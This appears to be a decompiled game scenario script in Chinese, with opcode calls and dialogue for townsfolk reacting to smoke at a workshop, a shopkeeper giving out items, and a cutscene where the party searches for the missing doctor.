ChrTalk( 0xFE, "哎！亲卫队！\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果顺利的话，\x01", "我就能出名啦。\x02", ) ) CloseMessageWindow() label("loc_35C4") TalkEnd(0xFE) Return() # Function_38_34EF end def Function_39_35C8(): pass label("Function_39_35C8") TalkBegin(0xFE) ChrTalk( 0xFE, ( "看起来\x01", "不像是火灾呀……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "但那么多烟是怎么回事呢？\x02", ) CloseMessageWindow() TalkEnd(0xFE) Return() # Function_39_35C8 end def Function_40_3615(): pass label("Function_40_3615") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_371F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_END)), "loc_36A0") ChrTalk( 0xFE, ( "结果最后还是不知道\x01", "那些穿军装的人的真面目。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "他们到底\x01", "是什么人呢。\x02", ) ) CloseMessageWindow() Jump("loc_371C") label("loc_36A0") OP_A2(0x3) ChrTalk( 0xFE, ( "妈妈，王国军和协会\x01", "都已经尽力去调查了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "只不过那些情况\x01", "是不可能让我们知道的。\x02", ) ) CloseMessageWindow() label("loc_371C") Jump("loc_388C") label("loc_371F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_378B") ChrTalk( 0xFE, ( "妈妈，我看见的是\x01", "『穿蓝色军装的军人』。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我可没说过\x01", "我看见的是亲卫队哦。\x02", ) ) CloseMessageWindow() Jump("loc_388C") label("loc_378B") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_3856") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_END)), "loc_37D5") TurnDirection(0xFE, 0x107, 0) ChrTalk( 0xFE, ( "提妲，\x01", "工房的工作要加油哦。\x02", ) ) CloseMessageWindow() Jump("loc_3853") label("loc_37D5") TurnDirection(0xFE, 0x107, 0) OP_A2(0x3) ChrTalk( 0xFE, "提妲，你好啊。\x02", ) CloseMessageWindow() ChrTalk( 0x107, "#560F你好，温丝。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天也要去工房工作吗？\x01", "要加油哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#061F嗯，谢谢。\x02", ) CloseMessageWindow() label("loc_3853") Jump("loc_388C") label("loc_3856") ChrTalk( 0xFE, ( "妈妈，\x01", "阳台的花坛已经放满花盆了呀。\x02", ) ) CloseMessageWindow() label("loc_388C") TalkEnd(0xFE) Return() # Function_40_3615 end def Function_41_3890(): pass label("Function_41_3890") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_3A4F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 4)), scpexpr(EXPR_END)), "loc_3972") ChrTalk( 0xFE, ( "好了，\x01", "我也差不多该回店里去了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "擅自把商品分发给大家，\x01", "妻子一定会很生气吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "但能对大家有点用，\x01", "我就非常满足了。\x02", ) ) CloseMessageWindow() Jump("loc_3A4C") label("loc_3972") OP_A2(0x4) ChrTalk( 0xFE, ( "呼，\x01", "看来烟总算是散了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "听说没有人受伤，\x01", "真是太好了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "虽然有东西被偷走了，\x01", "只要再做个一样的不就行了吗。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "好了，\x01", "我也差不多该回店里去了。\x02", ) ) CloseMessageWindow() label("loc_3A4C") Jump("loc_3D86") label("loc_3A4F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_3D86") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 4)), scpexpr(EXPR_END)), "loc_3A9E") ChrTalk( 0xFE, ( "遇到有困难的人\x01", "一定要帮助他们啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "那么，你们要小心哦！\x02", ) CloseMessageWindow() Jump("loc_3D86") label("loc_3A9E") OP_A2(0x4) ChrTalk( 0xFE, "你们没事吧。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我是杂货店的埃尔文。\x01", "一听到有事就赶来了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我从店里带来很多东西，\x01", "想要什么就尽管说吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "在这种非常时刻，\x01", "当然不会收你们钱。\x02", ) ) CloseMessageWindow() Sleep(100) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 0, ( "【替身木偶】\x01", # 0 "【圣灵药】\x01", # 1 "【石化之刃】\x01", # 2 ) ) MenuEnd(0x2) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x2), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3C76") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "替身木偶\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x145, 1) Jump("loc_3D30") label("loc_3C76") Jc((scpexpr(EXPR_GET_RESULT, 0x2), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3CDB") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "圣灵药\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x1FD, 1) Jump("loc_3D30") label("loc_3CDB") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "石化之刃\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x27F, 1) label("loc_3D30") Sleep(100) ChrTalk( 0xFE, "好，这个就给你们了。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果遇到有困难的人\x01", "一定要帮助他们啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "那么，你们要小心哦！\x02", ) CloseMessageWindow() label("loc_3D86") TalkEnd(0xFE) Return() # Function_41_3890 end def Function_42_3D8A(): pass label("Function_42_3D8A") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 0)), scpexpr(EXPR_END)), "loc_3ECC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 5)), scpexpr(EXPR_END)), "loc_3E41") ChrTalk( 0xFE, ( "可是，我不在的时候\x01", "竟然发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "冈多夫先生外出时让我留守，\x01", "发生了这样的事，我简直没脸见他。\x02", ) ) CloseMessageWindow() Jump("loc_3EC9") label("loc_3E41") OP_A2(0x5) ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_3EC9") Jump("loc_437F") label("loc_3ECC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_437F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 5)), scpexpr(EXPR_END)), "loc_3F80") ChrTalk( 0xFE, ( "我不在的时候\x01", "竟然发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "冈多夫先生外出时让我留守，\x01", "发生了这样的事，我简直没脸见他。\x02", ) ) CloseMessageWindow() Jump("loc_437F") label("loc_3F80") OP_A2(0x5) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAF, 4)), scpexpr(EXPR_EXEC_OP, "OP_29(0x28, 0x0, 0x4)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_42FA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xB9, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4272") OP_A2(0x5CD) TurnDirection(0xFE, 0x101, 0) ChrTalk( 0xFE, "啊！是你们！\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#501F啊，是王先生……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我、我刚刚\x01", "才回到蔡斯……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "这到底发生什么事了！？\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#003F嗯，其实啊……\x02", ) CloseMessageWindow() TurnDirection(0x106, 0x101, 400) ChrTalk( 0x106, ( "#050F喂，你在干什么。\x02\x03", "赶快回协会去吧。\x01", "我们可没时间再磨蹭了。\x02", ) ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0xE, 0xF, 0xFA, 0x2) OP_22(0x31, 0x0, 0x64) TurnDirection(0x101, 0x106, 400) Sleep(400) ChrTalk( 0x101, ( "#009F唔唔……\x02\x03", "#007F哼，虽然不甘心，\x01", "但阿加特说得没错。\x02", ) ) CloseMessageWindow() TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, "#018F……有什么不甘心的。\x02", ) CloseMessageWindow() TurnDirection(0x106, 0x12, 400) ChrTalk( 0x106, ( "#053F还有你。\x02\x03", "作为游击士，\x01", "应该自己去确认当前的状况。\x02", ) ) CloseMessageWindow() TurnDirection(0xFE, 0x106, 400) ChrTalk( 0xFE, "……确实是这样。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不好意思，\x01", "我有点自乱阵脚了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, ( "#053F呼……\x02\x03", "算了，既然已经发生了，\x01", "现在就考虑一下对策吧。\x02\x03", "#050F……喂，走啦。\x02", ) ) CloseMessageWindow() def lambda_421A(): TurnDirection(0x102, 0x12, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_421A) TurnDirection(0x101, 0x12, 400) ChrTalk( 0x101, "#000F回头见，王先生……\x02", ) CloseMessageWindow() TurnDirection(0xFE, 0x101, 0) ChrTalk( 0xFE, "啊啊，刚刚真是对不起。\x02", ) CloseMessageWindow() ChrTalk( 0x102, "#010F那么我们就告辞了。\x02", ) CloseMessageWindow() Jump("loc_42F7") label("loc_4272") ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_42F7") Jump("loc_437F") label("loc_42FA") ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_437F") TalkEnd(0xFE) Return() # Function_42_3D8A end def Function_43_4383(): pass label("Function_43_4383") OP_A3(0x540) OP_A3(0x541) OP_A3(0x546) OP_A3(0x543) OP_A3(0x544) OP_A3(0x545) OP_A2(0x546) Return() # Function_43_4383 end def Function_44_4399(): pass label("Function_44_4399") OP_22(0x74, 0x0, 0x64) Sleep(300) OP_22(0x74, 0x0, 0x64) Sleep(300) FadeToDark(300, 0, 100) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "按了按钮，没有任何反应。\x01", "导力梯好像不能用了。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) TalkEnd(0xFF) Return() # Function_44_4399 end def Function_45_4421(): pass label("Function_45_4421") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_451A") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_449C") TurnDirection(0x102, 0x1, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_44FC") label("loc_449C") TurnDirection(0x102, 0x0, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() label("loc_44FC") OP_90(0x0, 0xFFFFFA24, 0x0, 0x0, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Jump("loc_477E") label("loc_451A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_477E") OP_A2(0x50B) ClearMapFlags(0x1) EventBegin(0x0) OP_8C(0x102, 90, 0) OP_8C(0x101, 90, 0) OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) Sleep(1000) ChrTalk( 0x101, "#004F这，这是什么？\x02", ) CloseMessageWindow() Sleep(100) Fade(500) OP_6D(6010, 2000, 59020, 0) OP_67(0, 2920, -10000, 0) OP_6B(3630, 0) OP_6C(270000, 0) OP_6E(262, 0) SetChrPos(0x101, -13400, 8000, 59680, 90) SetChrPos(0x102, -13620, 8000, 58750, 90) OP_0D() def lambda_45FA(): OP_6D(-13820, 9000, 59010, 6000) ExitThread() QueueWorkItem(0x101, 2, lambda_45FA) Sleep(1000) OP_67(0, 11000, -10000, 5000) WaitChrThread(0x101, 0x2) Sleep(1000) Fade(1000) OP_6D(-13480, 8000, 59160, 0) OP_67(0, 11000, -10000, 0) OP_6B(2800, 0) OP_6C(314000, 0) OP_6E(262, 0) OP_0D() ChrTalk( 0x102, ( "#014F好像是……会移动的楼梯。\x02\x03", "这楼梯看上去好长啊，\x01", "自己走下去应该会很辛苦……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#007F话、话是这样说，\x01", "但是用机械移动也太……\x02\x03", "#509F自从到了这个城镇之后，\x01", "感觉除了惊讶之外就没有其他反应了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#019F我也有同感。\x02", ) CloseMessageWindow() EventEnd(0x0) label("loc_477E") Return() # Function_45_4421 end def Function_46_477F(): pass label("Function_46_477F") ClearMapFlags(0x1) EventBegin(0x0) OP_6D(-35180, 10000, 58970, 0) OP_6B(2410, 0) OP_6C(270000, 0) SetChrPos(0x101, -34470, 10000, 59690, 225) SetChrPos(0x102, -34480, 10000, 58410, 315) SetChrPos(0x107, -35490, 10000, 59000, 90) FadeToBright(1000, 0) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xBA, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_497F") ChrTalk( 0x101, ( "#501F亚尔摩村啊～\x01", "我已经开始有点期待呢。\x02\x03", "那里是个以温泉著名的胜地吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#061F是的。\x01", "是个非常棒的地方哦。\x02\x03", "之前我跟爷爷\x01", "去过那里好几次呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F要去那个村子的话，\x01", "该怎么走呢？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F我想想。\x02\x03", "出了城镇的南面出口\x01", "就是宽广的平原道……\x02\x03", "沿着托兰特平原道\x01", "一直向南走就到了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006FＯＫ！\x01", "沿着平原道一直往南走对吧。\x02\x03", "#001F那么，我们出发吧！\x02", ) ) CloseMessageWindow() Jump("loc_4AD0") label("loc_497F") ChrTalk( 0x101, ( "#501F亚尔摩村啊～\x01", "我已经开始有点期待呢。\x02\x03", "那里是个以温泉著名的胜地吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#061F是的。\x01", "是个非常棒的地方哦。\x02\x03", "之前我跟爷爷\x01", "去过那里好几次呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F的确是个让人期待的地方，\x01", "那么我们就赶快前往亚尔摩吧。\x02\x03", "是从南面的门口出去对吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F是呢，出去之后，\x01", "沿着托兰特平原道向南走就到了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006FＯＫ！\x01", "那么，我们出发吧！\x02", ) ) CloseMessageWindow() label("loc_4AD0") OP_28(0x40, 0x1, 0x1) EventEnd(0x0) Return() # Function_46_477F end def Function_47_4AD9(): pass label("Function_47_4AD9") EventBegin(0x0) OP_28(0x41, 0x4, 0x2) OP_28(0x41, 0x4, 0x4) OP_28(0x41, 0x1, 0x1) OP_72(0x0, 0x10) OP_6F(0x0, 60) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_6D(-14970, 8000, 55370, 0) OP_67(0, 11000, -10000, 0) OP_6B(3000, 0) OP_6C(224000, 0) OP_4A(0xA, 255) OP_4A(0x9, 255) OP_4A(0xB, 255) OP_4A(0x8, 255) ClearChrFlags(0x8, 0x80) ClearChrFlags(0x9, 0x80) ClearChrFlags(0xB, 0x80) ClearChrFlags(0xA, 0x80) RemoveParty(0xF, 0xFF) SetChrPos(0x101, -14050, 8000, 56120, 270) SetChrPos(0x102, -13280, 8000, 55260, 270) SetChrPos(0x107, -13040, 8000, 57050, 270) SetChrPos(0x8, -12520, 8000, 56020, 270) SetChrPos(0x1C, -37650, 10000, 59010, 0) SetChrPos(0x1B, -37650, 10000, 59010, 0) SetChrPos(0x17, -37650, 10000, 59010, 0) SetChrPos(0xB, -37650, 10000, 59010, 0) SetChrPos(0xA, -37650, 10000, 59010, 0) SetChrPos(0x9, -26520, 8000, 57300, 0) SetChrFlags(0x1C, 0x80) SetChrFlags(0x1B, 0x80) SetChrFlags(0x17, 0x80) SetChrFlags(0xB, 0x80) def lambda_4C22(): label("loc_4C22") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4C22") QueueWorkItem2(0xB, 1, lambda_4C22) def lambda_4C33(): OP_8E(0xFE, 0xFFFF9E12, 0x1F40, 0xE2CC, 0x1388, 0x0) ExitThread() QueueWorkItem(0xB, 2, lambda_4C33) FadeToBright(2000, 0) OP_20(0x5DC) OP_0D() OP_21() OP_1D(0x51) ChrTalk( 0x101, "#004F啊啊！？\x02", ) CloseMessageWindow() def lambda_4C73(): OP_6D(-25700, 8000, 55810, 2000) ExitThread() QueueWorkItem(0x101, 2, lambda_4C73) FadeToDark(1000, 0, -1) OP_0D() OP_44(0x101, 0xFF) FadeToBright(2000, 0) StopSound(0x0, 0x3D090, 0x0) OP_6D(-35690, 20250, 58940, 0) OP_67(0, 20360, -10000, 0) OP_6B(3390, 0) OP_6C(294000, 0) SetChrFlags(0x1C, 0x80) SetChrFlags(0x1B, 0x80) SetChrFlags(0x17, 0x80) SetChrFlags(0xB, 0x80) SetChrFlags(0x11, 0x80) SetChrFlags(0x22, 0x80) SetChrFlags(0x23, 0x80) SetChrFlags(0x1C, 0x40) SetChrFlags(0x1B, 0x40) SetChrFlags(0x17, 0x40) SetChrFlags(0xB, 0x40) SetChrFlags(0x11, 0x40) SetChrFlags(0x22, 0x40) SetChrFlags(0x23, 0x40) SetChrFlags(0x11, 0x4) SetChrFlags(0x22, 0x4) SetChrFlags(0x23, 0x4) SetChrFlags(0xA, 0x80) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x1C, 0) OP_4A(0x1B, 0) OP_4A(0x17, 0) OP_4A(0xB, 0) OP_4A(0xA, 0) OP_4A(0x24, 0) SetChrPos(0x11, -37650, 10000, 59010, 0) SetChrPos(0x22, -37650, 10000, 59010, 0) SetChrPos(0x23, -37650, 10000, 59010, 0) StopSound(0x0, 0x0, 0x2710) def lambda_4DA2(): OP_6C(225000, 11000) ExitThread() QueueWorkItem(0x102, 3, lambda_4DA2) ClearChrFlags(0xB, 0x80) def lambda_4DB7(): label("loc_4DB7") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4DB7") QueueWorkItem2(0xB, 1, lambda_4DB7) def lambda_4DC8(): OP_8E(0xFE, 0xFFFF9E12, 0x1F40, 0xE2CC, 0xFA0, 0x0) ExitThread() QueueWorkItem(0xB, 2, lambda_4DC8) Sleep(500) ClearChrFlags(0x11, 0x80) def lambda_4DED(): label("loc_4DED") OP_8C(0xFE, 166, 0) OP_48() Jump("loc_4DED") QueueWorkItem2(0x11, 1, lambda_4DED) def lambda_4DFE(): OP_8E(0xFE, 0xFFFF7CAC, 0x2710, 0xF000, 0x1388, 0x0) ExitThread() QueueWorkItem(0x11, 2, lambda_4DFE) Sleep(500) ClearChrFlags(0x17, 0x80) def lambda_4E23(): label("loc_4E23") OP_8C(0xFE, 90, 0) OP_48() Jump("loc_4E23") QueueWorkItem2(0x17, 1, lambda_4E23) def lambda_4E34(): OP_8E(0xFE, 0xFFFF8D0A, 0x1F40, 0xDF84, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x17, 2, lambda_4E34) Sleep(1000) ClearChrFlags(0x22, 0x80) def lambda_4E59(): label("loc_4E59") OP_8C(0xFE, 296, 0) OP_48() Jump("loc_4E59") QueueWorkItem2(0x22, 1, lambda_4E59) def lambda_4E6A(): OP_8E(0xFE, 0xFFFF7F36, 0x2710, 0xDBF6, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x22, 2, lambda_4E6A) def lambda_4E85(): OP_6D(-35440, 14790, 58910, 5000) ExitThread() QueueWorkItem(0x101, 1, lambda_4E85) Sleep(1000) def lambda_4EA2(): OP_67(0, 12040, -10000, 4000) ExitThread() QueueWorkItem(0x101, 2, lambda_4EA2) ClearChrFlags(0x23, 0x80) def lambda_4EBF(): label("loc_4EBF") OP_8C(0xFE, 330, 0) OP_48() Jump("loc_4EBF") QueueWorkItem2(0x23, 1, lambda_4EBF) def lambda_4ED0(): OP_8E(0xFE, 0xFFFF7E6E, 0x2710, 0xD886, 0x1388, 0x0) ExitThread() QueueWorkItem(0x23, 2, lambda_4ED0) Sleep(1000) ClearChrFlags(0x1C, 0x80) def lambda_4EF5(): label("loc_4EF5") OP_8C(0xFE, 0, 0) OP_48() Jump("loc_4EF5") QueueWorkItem2(0x1C, 1, lambda_4EF5) def lambda_4F06(): OP_8E(0xFE, 0xFFFF9642, 0x1F40, 0xE8E4, 0x1388, 0x0) ExitThread() QueueWorkItem(0x1C, 2, lambda_4F06) Sleep(1000) ClearChrFlags(0x1B, 0x80) def lambda_4F2B(): label("loc_4F2B") OP_8C(0xFE, 90, 0) OP_48() Jump("loc_4F2B") QueueWorkItem2(0x1B, 1, lambda_4F2B) def lambda_4F3C(): OP_8E(0xFE, 0xFFFF961A, 0x1F40, 0xEC04, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x1B, 2, lambda_4F3C) Sleep(2000) def lambda_4F5C(): OP_6D(-26430, 8000, 57990, 4000) ExitThread() QueueWorkItem(0x101, 1, lambda_4F5C) def lambda_4F74(): OP_67(0, 11000, -10000, 4000) ExitThread() QueueWorkItem(0x101, 2, lambda_4F74) def lambda_4F8C(): OP_6B(3000, 4000) ExitThread() QueueWorkItem(0x102, 1, lambda_4F8C) def lambda_4F9C(): label("loc_4F9C") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4F9C") QueueWorkItem2(0x9, 1, lambda_4F9C) Sleep(300) ClearChrFlags(0xA, 0x80) OP_62(0xA, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3) OP_8E(0xA, 0xFFFF96E2, 0x1F40, 0xE54C, 0xFA0, 0x0) Sleep(1000) OP_44(0x9, 0xFF) OP_44(0xB, 0xFF) ChrTalk( 0xA, ( "呼呼……\x01", "还、还以为死定了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, "#800F没事比什么都好。\x02", ) CloseMessageWindow() TurnDirection(0x9, 0xB, 400) ChrTalk( 0x9, "#804F好，所有人都没事吧？\x02", ) CloseMessageWindow() TurnDirection(0xB, 0x9, 400) ChrTalk( 0xB, "是、是的，普通员工都……\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#2P工房长先生！\x02", ) CloseMessageWindow() def lambda_50CF(): OP_6D(-25700, 8000, 55810, 2000) ExitThread() QueueWorkItem(0x101, 2, lambda_50CF) def lambda_50E7(): label("loc_50E7") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_50E7") QueueWorkItem2(0x9, 1, lambda_50E7) def lambda_50F8(): label("loc_50F8") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_50F8") QueueWorkItem2(0xB, 1, lambda_50F8) def lambda_5109(): label("loc_5109") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5109") QueueWorkItem2(0xA, 1, lambda_5109) def lambda_511A(): OP_8E(0xFE, 0xFFFFA010, 0x1F40, 0xDD9A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_511A) Sleep(300) def lambda_513A(): OP_8E(0xFE, 0xFFFF9F16, 0x1F40, 0xDA0C, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_513A) Sleep(300) def lambda_515A(): OP_8E(0xFE, 0xFFFFA2D6, 0x1F40, 0xE146, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_515A) Sleep(300) def lambda_517A(): OP_8E(0xFE, 0xFFFFA52E, 0x1F40, 0xDBA6, 0x1388, 0x0) ExitThread() QueueWorkItem(0x8, 1, lambda_517A) WaitChrThread(0x102, 0x1) TurnDirection(0x102, 0x9, 0) ChrTalk( 0x9, ( "#802F#2P哦哦，是你们……\x01", "已经从亚尔摩回来了啊！\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#002F这骚动究竟是怎么回事！？\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#804F#2P看来是建筑物内部哪里的\x01", "瓦斯泄漏了出来！\x02\x03", "从地下到五楼都是烟。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#012F难道是火灾吗？\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#803F#2P灭火装置没有运作，\x01", "所以应该不用担心是火灾。\x02\x03", "但是，为什么会漏烟，\x01", "这一点我实在是想不通……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#063F那、那个，工房长叔叔。\x01", "爷爷他在哪呢？\x02", ) ) CloseMessageWindow() OP_44(0xA, 0xFF) OP_44(0x9, 0xFF) OP_44(0xB, 0xFF) ChrTalk( 0x9, "#802F#2P咦，他不是在……\x02", ) CloseMessageWindow() TurnDirection(0x9, 0xB, 400) ChrTalk( 0x9, ( "#802F#2P海泽尔。\x01", "你不是已经确认过了吗？\x02", ) ) CloseMessageWindow() TurnDirection(0xB, 0x9, 400) ChrTalk( 0xB, "那、那个……\x02", ) CloseMessageWindow() TurnDirection(0x107, 0xB, 0) ChrTalk( 0xB, ( "普通员工都已经确认过了，\x01", "不过唯独拉赛尔博士还没……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#065F！！！\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#804F#2P你说什么！\x01", "他还留在里面吗！？\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#005F工房长先生！\x01", "博士的事就交给我们吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#012F我们进去看看情况。\x02", ) CloseMessageWindow() TurnDirection(0x9, 0x101, 0) ChrTalk( 0x9, ( "#805F#2P不、不好意思。\x01", "又要拜托你们俩了。\x02", ) ) CloseMessageWindow() TurnDirection(0x107, 0x101, 400) ChrTalk( 0x107, "#065F我、我也去……！\x02", ) CloseMessageWindow() def lambda_5519(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_5519) 